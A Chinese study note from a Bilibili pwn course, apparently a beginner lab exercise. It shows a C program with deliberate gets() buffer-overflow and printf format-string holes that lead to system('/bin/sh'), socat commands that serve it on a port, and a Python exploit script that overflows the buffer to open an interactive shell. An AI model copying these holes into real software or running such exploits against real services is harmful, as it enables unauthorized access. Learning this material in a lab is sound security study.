本文是B站你想有多PWN学习的笔记,包含一些视频外的扩展知识。
#include
#include
#include
char sh[]="/bin/sh";
int init_func(){
setvbuf(stdin,0,2,0);
setvbuf(stdout,0,2,0);
setvbuf(stderr,0,2,0);
return 0;
}
int func(char *cmd){
system(cmd);
return 0;
}
int main(){
char a[8] = {};
char b[8] = {};
puts("input:");
gets(a);
printf(a);
if(b[0]==0x10){
func(sh);
}
return 0;
}
使用以下命令进行编译:
gcc question_1.c -o question_1_plus_x64
socat tcp-l:8877,fork exec:./question_1_plus_x64,reuseaddr
nc 127.0.0.1 8877
import socket
import telnetlib
def pwn():
# 创建一个TCP socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# 连接服务器127.0.0.1的8877
s.connect(("192.168.44.138", 8877))
payload = 'A' * 0x8 + '\x10\n' # 构造payload
s.sendall(payload.encode(encoding='utf_8', errors='strict')) # python3这里需要编码
# 创建一个telnet来产生一个控制服务器的shell
t = telnetlib.Telnet()
t.sock = s
t.interact()
if __name__ == "__main__":
# socat tcp-l:8888,fork exec:./question_1_plus_x64,reuseaddr
pwn()